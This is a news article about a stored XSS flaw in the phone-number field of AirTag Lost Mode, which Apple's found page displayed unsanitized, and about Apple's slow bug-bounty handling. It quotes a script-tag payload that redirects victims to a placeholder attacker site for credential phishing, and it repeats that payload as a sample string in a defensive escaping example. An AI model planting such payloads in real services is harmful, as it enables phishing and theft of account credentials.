The hits keep coming to Apple's bug-bounty program, which security researchers say is slow and inconsistent in responding to vulnerability reports.
This time, the vuln du jour is due to a failure to sanitize a user-input field: specifically, the phone number field AirTag owners use to identify their lost devices.
The Good Samaritan attack
Security consultant and penetration tester Bobby Rauch discovered that Apple's AirTags, tiny devices which can be affixed to frequently lost objects like laptops, phones, or car keys, do not sanitize user input. This oversight opens the door for AirTags to be used in a drop attack. Instead of seeding a target's parking lot with USB drives loaded with malware, an attacker can drop a maliciously prepared AirTag.
This sort of attack does not need much technological know-how: the attacker simply types valid XSS into the AirTag's phone number field, then puts the AirTag in Lost mode and drops it somewhere the target is likely to find it. In theory, scanning a lost AirTag is a safe action; it is only supposed to pop up a webpage at https://found.apple.com/. The problem is that found.apple.com then embeds the contents of the phone number field in the website as displayed on the victim's browser, unsanitized.
The most obvious way to exploit this vulnerability, Rauch reports, is to use simple XSS to pop up a fake iCloud login dialog on the victim's phone. This doesn't take much at all in the way of code:
<script>window.location='https://path/to/badsite.tld/page.html';var a="";</script>
When found.apple.com innocently embeds the XSS above into the response for a scanned AirTag, the victim gets a popup window which displays the contents of badsite.tld/page.html. This could be a zero-day exploit for the browser or simply a phishing dialog. Rauch hypothesizes a fake iCloud login dialog, which can be made to look just like the real thing, but which dumps the victim's Apple credentials onto the attacker's server instead.
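The root cause described above is output encoding, not the phone number itself. The following is an added defender-side example, not Apple's code and not part of Rauch's disclosure; it assumes a hypothetical lost-mode page that builds its HTML from the raw field string, and contrasts that vulnerable pattern with input validation plus HTML escaping.

```javascript
// Added example: safely rendering an owner-supplied phone number field on a
// lost-mode page. Function names (renderLostModeUnsafe, renderLostModeSafe,
// escapeHtml, isPlausiblePhoneNumber) are hypothetical, not Apple's.

// Constructed sample values: a legitimate number and a payload of the shape
// the article quotes (a script tag that redirects the browser).
const benignPhone = "+1 555 0100";
const hostilePhone =
  "<script>window.location='https://badsite.tld/page.html';var a=\"\";</script>";

// Output encoding: escape the five characters that let text break out of an
// HTML text node or attribute value. This alone would have prevented the bug
// the article describes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Input validation: a phone number field has no business containing markup.
// Allow digits, spaces, '+', '-', parentheses and '.' only, with a sane length.
function isPlausiblePhoneNumber(s) {
  return /^[0-9+\-() .]{3,32}$/.test(s);
}

// Vulnerable rendering pattern: raw concatenation of user input into HTML.
function renderLostModeUnsafe(phone) {
  return "<p>Call the owner at: " + phone + "</p>";
}

// Hardened rendering: reject markup at the input boundary and encode at the
// output boundary. Defense in depth: either layer alone stops this payload.
function renderLostModeSafe(phone) {
  if (!isPlausiblePhoneNumber(phone)) {
    return "<p>No contact number provided.</p>";
  }
  return "<p>Call the owner at: " + escapeHtml(phone) + "</p>";
}
```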
Although this is a compelling exploit, it's by no means the only one available; virtually anything you can do with a webpage is on the table. That ranges from simple phishing, as seen in the above example, to exposing the victim's phone to a zero-day no-click browser vulnerability.
More technical detail, and short videos showing both the vulnerability and the network activity spawned by Rauch's exploit of it, are available in Rauch's public disclosure on Medium.
This public disclosure brought to you by Apple
Rauch told Krebs that he initially disclosed the vulnerability privately to Apple on June 20, but for three months all the company would tell him was that it was "still investigating." That's an odd response for what appears to be a very simple bug to verify and mitigate. Last Thursday, Apple emailed Rauch to say the weakness would be addressed in a coming update, and it asked that he not talk about it publicly in the meantime.
Apple never responded to basic questions Rauch asked, such as whether it had a timeline for fixing the bug, whether it planned to credit him for the report, and whether it would qualify for a bounty. The lack of communication from Cupertino prompted Rauch to go public on Medium, despite the fact that Apple requires researchers to keep quiet about their discoveries if they want credit and/or compensation for their work.
Rauch expressed willingness to work with Apple but asked the company to "provide some details of when you plan on remediating this, and whether there would be any recognition or bug bounty payout." He also warned the company that he planned to publish in 90 days. Rauch says that Apple's response was "basically, we'd appreciate it if you didn't leak this."
We have reached out to Apple for comment and will update here with any reply.